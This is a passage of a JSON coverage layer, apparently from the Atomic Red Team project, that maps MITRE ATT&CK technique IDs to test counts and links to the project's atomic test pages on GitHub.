Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View 